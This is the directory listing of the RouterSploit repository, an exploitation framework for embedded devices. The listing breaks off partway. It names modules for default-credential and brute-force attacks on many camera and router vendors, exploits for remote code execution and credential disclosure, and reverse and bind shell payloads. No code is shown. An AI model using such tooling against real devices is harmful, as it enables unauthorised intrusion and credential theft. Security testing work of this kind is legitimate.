Repository: threat9/routersploit Branch: master Commit: 6c5d37cf9c78 Files: 1215 Total size: 1.5 MB Directory structure: gitextract_hxqwu9j7/ ├── .dockerignore ├── .github/ │ ├── ISSUE_TEMPLATE.md │ └── PULL_REQUEST_TEMPLATE.md ├── .gitignore ├── .travis/ │ ├── install.sh │ └── run.sh ├── .travis.yml ├── CONTRIBUTING.md ├── Dockerfile ├── LICENSE ├── MANIFEST.in ├── Makefile ├── README.md ├── docker-compose.yaml ├── docs/ │ └── modules/ │ ├── creds/ │ │ ├── cameras/ │ │ │ ├── acti/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── american_dynamics/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── arecont/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── avigilon/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── avtech/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── axis/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── basler/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── brickcom/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── canon/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── cisco/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── dlink/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── geovision/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── grandstream/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── hikvision/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── honeywell/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── iqinvision/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── jvc/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── mobotix/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── samsung/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── sentry360/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── siemens/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── speco/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── stardot/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ ├── vacron/ │ │ │ │ ├── ftp_default_creds.md │ │ │ │ ├── ssh_default_creds.md │ │ │ │ └── telnet_default_creds.md │ │ │ └── videoiq/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ └── routers/ │ │ ├── asmax/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── asus/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── belkin/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── bhu/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── billion/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── cisco/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── comtrend/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── dlink/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── fortinet/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── huawei/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── ipfire/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── juniper/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── linksys/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── mikrotik/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── movistar/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── netcore/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── netgear/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── netsys/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── pfsense/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── technicolor/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── thomson/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── tplink/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── ubiquiti/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ ├── zte/ │ │ │ ├── ftp_default_creds.md │ │ │ ├── ssh_default_creds.md │ │ │ └── telnet_default_creds.md │ │ └── zyxel/ │ │ ├── ftp_default_creds.md │ │ ├── ssh_default_creds.md │ │ └── telnet_default_creds.md │ ├── encoders/ │ │ ├── perl/ │ │ │ ├── base64.md │ │ │ └── hex.md │ │ ├── php/ │ │ │ ├── base64.md │ │ │ └── hex.md │ │ └── python/ │ │ ├── base64.md │ │ └── hex.md │ ├── exploits/ │ │ ├── cameras/ │ │ │ ├── acti/ │ │ │ │ └── acm_5611_rce.md │ │ │ ├── geuterbruck/ │ │ │ │ └── efd_2250.md │ │ │ ├── jovision/ │ │ │ │ └── jovision_credentials_disclosure.md │ │ │ └── multi/ │ │ │ └── cctv_dvr_rce.md │ │ ├── misc/ │ │ │ └── watchguard/ │ │ │ └── xcs_9_rce.md │ │ └── routers/ │ │ ├── asus/ │ │ │ ├── asuswrt_lan_rce.md │ │ │ └── infosvr_backdoor_rce.md │ │ ├── cisco/ │ │ │ └── rv320_command_injection.md │ │ ├── dlink/ │ │ │ ├── dir_655_866_652_rce.md │ │ │ └── dsl_2750b_rce.md │ │ ├── ipfire/ │ │ │ ├── ipfire_proxy_rce.md │ │ │ └── ipfire_shellshock.md │ │ ├── linksys/ │ │ │ └── eseries_themoon_rce.md │ │ ├── mikrotik/ │ │ │ └── winbox_auth_bypass_creds_disclosure.md │ │ ├── multi/ │ │ │ ├── tcp_32764_info_disclosure.md │ │ │ └── tcp_32764_rce.md │ │ └── zte/ │ │ └── zxhn_h108n_wifi_password_disclosure.md │ ├── generic/ │ │ └── upnp/ │ │ └── ssdp_msearch.md │ └── payloads/ │ ├── armle/ │ │ ├── bind_tcp.md │ │ └── reverse_tcp.md │ ├── cmd/ │ │ ├── awk_bind_tcp.md │ │ ├── awk_bind_udp.md │ │ ├── awk_reverse_tcp.md │ │ ├── bash_reverse_tcp.md │ │ ├── netcat_bind_tcp.md │ │ ├── netcat_reverse_tcp.md │ │ ├── perl_bind_tcp.md │ │ ├── perl_reverse_tcp.md │ │ ├── php_bind_tcp.md │ │ ├── php_reverse_tcp.md │ │ ├── python_bind_tcp.md │ │ ├── python_bind_udp.md │ │ ├── python_reverse_tcp.md │ │ └── python_reverse_udp.md │ ├── mipsbe/ │ │ ├── bind_tcp.md │ │ └── reverse_tcp.md │ ├── mipsle/ │ │ ├── bind_tcp.md │ │ └── reverse_tcp.md │ ├── perl/ │ │ ├── bind_tcp.md │ │ └── reverse_tcp.md │ ├── php/ │ │ ├── bind_tcp.md │ │ └── reverse_tcp.md │ ├── python/ │ │ ├── bind_tcp.md │ │ ├── bind_udp.md │ │ ├── reverse_tcp.md │ │ └── reverse_udp.md │ ├── x64/ │ │ ├── bind_tcp.md │ │ └── reverse_tcp.md │ └── x86/ │ ├── bind_tcp.md │ └── reverse_tcp.md ├── requirements-dev.txt ├── requirements.txt ├── routersploit/ │ ├── __init__.py │ ├── core/ │ │ ├── __init__.py │ │ ├── bluetooth/ │ │ │ ├── __init__.py │ │ │ ├── btle/ │ │ │ │ ├── __init__.py │ │ │ │ ├── btle_device.py │ │ │ │ └── btle_scanner.py │ │ │ └── btle_client.py │ │ ├── exploit/ │ │ │ ├── __init__.py │ │ │ ├── encoders.py │ │ │ ├── exceptions.py │ │ │ ├── exploit.py │ │ │ ├── option.py │ │ │ ├── payloads.py │ │ │ ├── printer.py │ │ │ ├── shell.py │ │ │ └── utils.py │ │ ├── ftp/ │ │ │ ├── __init__.py │ │ │ └── ftp_client.py │ │ ├── http/ │ │ │ ├── __init__.py │ │ │ └── http_client.py │ │ ├── snmp/ │ │ │ ├── __init__.py │ │ │ └── snmp_client.py │ │ ├── ssh/ │ │ │ ├── __init__.py │ │ │ └── ssh_client.py │ │ ├── tcp/ │ │ │ ├── __init__.py │ │ │ └── tcp_client.py │ │ ├── telnet/ │ │ │ ├── __init__.py │ │ │ └── telnet_client.py │ │ └── udp/ │ │ ├── __init__.py │ │ └── udp_client.py │ ├── interpreter.py │ ├── libs/ │ │ ├── __init__.py │ │ ├── apiros/ │ │ │ ├── __init__.py │ │ │ └── apiros_client.py │ │ └── lzs/ │ │ ├── __init__.py │ │ └── lzs.py │ ├── modules/ │ │ ├── __init__.py │ │ ├── creds/ │ │ │ ├── __init__.py │ │ │ ├── cameras/ │ │ │ │ ├── __init__.py │ │ │ │ ├── acti/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ ├── telnet_default_creds.py │ │ │ │ │ └── webinterface_http_form_default_creds.py │ │ │ │ ├── american_dynamics/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── arecont/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── avigilon/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── avtech/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── axis/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ ├── telnet_default_creds.py │ │ │ │ │ └── webinterface_http_auth_default_creds.py │ │ │ │ ├── basler/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ ├── telnet_default_creds.py │ │ │ │ │ └── webinterface_http_form_default_creds.py │ │ │ │ ├── brickcom/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ ├── telnet_default_creds.py │ │ │ │ │ └── webinterface_http_auth_default_creds.py │ │ │ │ ├── canon/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ ├── telnet_default_creds.py │ │ │ │ │ └── webinterface_http_auth_default_creds.py │ │ │ │ ├── cisco/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── dlink/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── geovision/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── grandstream/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── hikvision/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── honeywell/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── iqinvision/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── jvc/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── mobotix/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── samsung/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── sentry360/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── siemens/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── speco/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── stardot/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ ├── vacron/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── ftp_default_creds.py │ │ │ │ │ ├── ssh_default_creds.py │ │ │ │ │ └── telnet_default_creds.py │ │ │ │ └── videoiq/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── generic/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_bruteforce.py │ │ │ │ ├── ftp_default.py │ │ │ │ ├── http_basic_digest_bruteforce.py │ │ │ │ ├── http_basic_digest_default.py │ │ │ │ ├── snmp_bruteforce.py │ │ │ │ ├── ssh_bruteforce.py │ │ │ │ ├── ssh_default.py │ │ │ │ ├── telnet_bruteforce.py │ │ │ │ └── telnet_default.py │ │ │ ├── printers/ │ │ │ │ └── __init__.py │ │ │ └── routers/ │ │ │ ├── 2wire/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── 3com/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── __init__.py │ │ │ ├── asmax/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ ├── telnet_default_creds.py │ │ │ │ └── webinterface_http_auth_default_creds.py │ │ │ ├── asus/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── belkin/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── bhu/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── billion/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── cisco/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── comtrend/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── dlink/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── fortinet/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── huawei/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── ipfire/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── juniper/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── linksys/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── mikrotik/ │ │ │ │ ├── __init__.py │ │ │ │ ├── api_ros_default_creds.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── movistar/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── netcore/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── netgear/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── netsys/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── pfsense/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── webinterface_http_form_default_creds.py │ │ │ ├── technicolor/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── thomson/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── tplink/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── ubiquiti/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ ├── zte/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ftp_default_creds.py │ │ │ │ ├── ssh_default_creds.py │ │ │ │ └── telnet_default_creds.py │ │ │ └── zyxel/ │ │ │ ├── __init__.py │ │ │ ├── ftp_default_creds.py │ │ │ ├── ssh_default_creds.py │ │ │ └── telnet_default_creds.py │ │ ├── encoders/ │ │ │ ├── __init__.py │ │ │ ├── perl/ │ │ │ │ ├── base64.py │ │ │ │ └── hex.py │ │ │ ├── php/ │ │ │ │ ├── __init__.py │ │ │ │ ├── base64.py │ │ │ │ └── hex.py │ │ │ └── python/ │ │ │ ├── __init__.py │ │ │ ├── base64.py │ │ │ └── hex.py │ │ ├── exploits/ │ │ │ ├── __init__.py │ │ │ ├── cameras/ │ │ │ │ ├── __init__.py │ │ │ │ ├── acti/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── acm_5611_rce.py │ │ │ │ ├── avigilon/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── videoiq_camera_path_traversal.py │ │ │ │ ├── beward/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── n100_rce.py │ │ │ │ ├── brickcom/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── corp_network_cameras_conf_disclosure.py │ │ │ │ │ └── users_cgi_creds_disclosure.py │ │ │ │ ├── cisco/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── video_surv_path_traversal.py │ │ │ │ ├── dlink/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── dcs_930l_932l_auth_bypass.py │ │ │ │ ├── geuterbruck/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── efd_2250.py │ │ │ │ ├── grandstream/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── gxv3611hd_ip_camera_backdoor.py │ │ │ │ │ └── gxv3611hd_ip_camera_sqli.py │ │ │ │ ├── honeywell/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── hicc_1100pt_password_disclosure.py │ │ │ │ ├── jovision/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── jovision_credentials_disclosure.py │ │ │ │ ├── multi/ │ │ │ │ │ ├── P2P_wificam_credential_disclosure.py │ │ │ │ │ ├── P2P_wificam_rce.py │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── cctv_dvr_rce.py │ │ │ │ │ ├── dvr_creds_disclosure.py │ │ │ │ │ ├── jvc_vanderbilt_honeywell_path_traversal.py │ │ │ │ │ └── netwave_ip_camera_information_disclosure.py │ │ │ │ ├── mvpower/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── dvr_jaws_rce.py │ │ │ │ ├── siemens/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── cvms2025_credentials_disclosure.py │ │ │ │ └── xiongmai/ │ │ │ │ ├── __init__.py │ │ │ │ └── uc_httpd_path_traversal.py │ │ │ ├── generic/ │ │ │ │ ├── __init__.py │ │ │ │ ├── heartbleed.py │ │ │ │ ├── shellshock.py │ │ │ │ └── ssh_auth_keys.py │ │ │ ├── misc/ │ │ │ │ ├── __init__.py │ │ │ │ ├── asus/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── b1m_projector_rce.py │ │ │ │ ├── miele/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── pg8528_path_traversal.py │ │ │ │ ├── watchguard/ │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── xcs_9_rce.py │ │ │ │ └── wepresent/ │ │ │ │ ├── __init__.py │ │ │ │ └── wipg1000_rce.py │ │ │ └── routers/ │ │ │ ├── 2wire/ │ │ │ │ ├── 4011g_5012nv_path_traversal.py │ │ │ │ ├── __init__.py │ │ │ │ └── gateway_auth_bypass.py │ │ │ ├── 3com/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ap8760_password_disclosure.py │ │ │ │ ├── imc_info_disclosure.py │ │ │ │ ├── imc_path_traversal.py │ │ │ │ ├── officeconnect_info_disclosure.py │ │ │ │ └── officeconnect_rce.py │ │ │ ├── __init__.py │ │ │ ├── asmax/ │ │ │ │ ├── __init__.py │ │ │ │ ├── ar_1004g_password_disclosure.py │ │ │ │ └── ar_804_gu_rce.py │ │ │ ├── asus/ │ │ │ │ ├── __init__.py │ │ │ │ ├── asuswrt_lan_rce.py │ │ │ │ ├── infosvr_backdoor_rce.py │ │ │ │ └── rt_n16_password_disclosure.py │ │ │ ├── belkin/ │ │ │ │ ├── __init__.py │ │ │ │ ├── auth_bypass.py │ │ │ │ ├── g_n150_password_disclosure.py │ │ │ │ ├── g_plus_info_disclosure.py │ │ │ │ ├── n150_path_traversal.py │ │ │ │ ├── n750_rce.py │ │ │ │ └── play_max_prce.py │ │ │ ├── bhu/ │ │ │ │ ├── __init__.py │ │ │ │ └── bhu_urouter_rce.py │ │ │ ├── billion/ │ │ │ │ ├── __init__.py │ │ │ │ ├── billion_5200w_rce.py │ │ │ │ └── billion_7700nr4_password_disclosure.py │ │ │ ├── cisco/ │ │ │ │ ├── __init__.py │ │ │ │ ├── catalyst_2960_rocem.py │ │ │ │ ├── dpc2420_info_disclosure.py │ │ │ │ ├── firepower_management60_path_traversal.py │ │ │ │ ├── firepower_management60_rce.py │ │ │ │ ├── ios_http_authorization_bypass.py │ │ │ │ ├── rv320_command_injection.py │ │ │ │ ├── secure_acs_bypass.py │ │ │ │ ├── ucm_info_disclosure.py │ │ │ │ ├── ucs_manager_rce.py │ │ │ │ └── unified_multi_path_traversal.py │ │ │ ├── comtrend/ │ │ │ │ ├── __init__.py │ │ │ │ └── ct_5361t_password_disclosure.py │ │ │ ├── dlink/ │ │ │ │ ├── __init__.py │ │ │ │ ├── dcs_930l_auth_rce.py │ │ │ │ ├── dgs_1510_add_user.py │ │ │ │ ├── dir_300_320_600_615_info_disclosure.py │ │ │ │ ├── dir_300_320_615_auth_bypass.py │ │ │ │ ├── dir_300_600_rce.py │ │ │ │ ├── dir_300_645_815_upnp_rce.py │ │ │ │ ├── dir_645_815_rce.py │ │ │ │ ├── dir_645_password_disclosure.py │ │ │ │ ├── dir_655_866_652_rce.py │ │ │ │ ├── dir_815_850l_rce.py │ │ │ │ ├── dir_825_path_traversal.py │ │ │ │ ├── dir_850l_creds_disclosure.py │ │ │ │ ├── dir_8xx_password_disclosure.py │ │ │ │ ├── dns_320l_327l_rce.py │ │ │ │ ├── dsl_2640b_dns_change.py │ │ │ │ ├── dsl_2730_2750_path_traversal.py │ │ │ │ ├── dsl_2730b_2780b_526b_dns_change.py │ │ │ │ ├── dsl_2740r_dns_change.py │ │ │ │ ├── dsl_2750b_info_disclosure.py │ │ │ │ ├── dsl_2750b_rce.py │ │ │ │ ├── dsp_w110_rce.py │ │ │ │ ├── dvg_n5402sp_path_traversal.py │ │ │ │ ├── dwl_3200ap_password_disclosure.py │ │ │ │ ├── dwr_932_info_disclosure.py │ │ │ │ ├── dwr_932b_backdoor.py │ │ │ │ ├── multi_hedwig_cgi_exec.py │ │ │ │ └── multi_hnap_rce.py │ │ │ ├── fortinet/ │ │ │ │ ├── __init__.py │ │ │ │ └── fortigate_os_backdoor.py │ │ │ ├── huawei/ │ │ │ │ ├── __init__.py │ │ │ │ ├── e5331_mifi_info_disclosure.py │ │ │ │ ├── hg520_info_disclosure.py │ │ │ │ ├── hg530_hg520b_password_disclosure.py │ │ │ │ ├── hg532_rce.py │ │ │ │ 